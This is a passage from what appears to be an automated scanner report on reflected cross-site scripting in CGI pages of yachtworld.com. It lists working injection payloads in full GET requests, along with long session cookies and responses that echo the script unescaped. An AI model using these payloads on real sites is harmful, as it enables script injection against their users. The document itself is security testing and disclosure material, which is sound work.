latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:44:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1



<html>
<head>
<TITLE>Jarrett Bay Yacht Sales (Beaufort, NC)</TITLE>
<META name="keywords" cont
...[SNIP]...
<INPUT TYPE="hidden" NAME="office_id" VALUE="1023057237a"><script>alert(1)</script>a865df0d3e4">
...[SNIP]...

3.503. http://www.yachtworld.com/jerseymarine/email.cgi [office_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/jerseymarine/email.cgi

Issue detail

The value of the office_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c948"><script>alert(1)</script>5aa7ebaaa6d was submitted in the office_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jerseymarine/email.cgi?url=jerseymarine&office_id=1113579c948"><script>alert(1)</script>5aa7ebaaa6d&boat_id=2262662 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:45:27 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1



<html>
<head>
<TITLE>Jersey Marine (Somers Point, NJ)</TITLE>
<META name="keywords" content="c
...[SNIP]...
<INPUT TYPE="hidden" NAME="office_id" VALUE="1113579c948"><script>alert(1)</script>5aa7ebaaa6d">
...[SNIP]...

3.504. http://www.yachtworld.com/jerseymarine/jerseymarine_2.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/jerseymarine/jerseymarine_2.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload 8e1ba<script>alert(1)</script>9d3d0a27e0b was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /jerseymarine/jerseymarine_2.cgi?company=jerseymarine&limit=50&type=&new=&units=Feet&hosturl=jerseymarine8e1ba<script>alert(1)</script>9d3d0a27e0b&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:45:54 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/jerseymarine8e1ba<script>alert(1)</script>9d3d0a27e0b/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/jerseymarine8e1ba<script>
...[SNIP]...

3.505. http://www.yachtworld.com/jerseymarine/jerseymarine_2.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/jerseymarine/jerseymarine_2.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 213a1--><script>alert(1)</script>8b2994f704b was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jerseymarine/jerseymarine_2.cgi?company=jerseymarine&limit=50&type=&new=&units=Feet&hosturl=jerseymarine213a1--><script>alert(1)</script>8b2994f704b&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:46:07 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<script>alert(1)</script>8b2994f704b/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/jerseymarine213a1-->
...[SNIP]...

3.506. http://www.yachtworld.com/leaving_yw.cgi [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/leaving_yw.cgi

Issue detail

The value of the url request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//cf28a19c was submitted in the url parameter. This input was echoed as javascript:alert(1)//cf28a19c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /leaving_yw.cgi?url=javascript%3aalert(1)//cf28a19c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:47 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET ROWS="55,*">
<FRAME SRC="/scripts/return2yw.cgi?referer=" NAME="back" noscroll>
<FRAME SRC="javascript:alert(1)//cf28a19c" NAME="cust_url">
</FRAMESET>

...[SNIP]...

3.507. http://www.yachtworld.com/leaving_yw.cgi [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/leaving_yw.cgi

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac29"><script>alert(1)</script>8837238e2e1 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /leaving_yw.cgi?url=http://www.starlingmarine.com9ac29"><script>alert(1)</script>8837238e2e1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 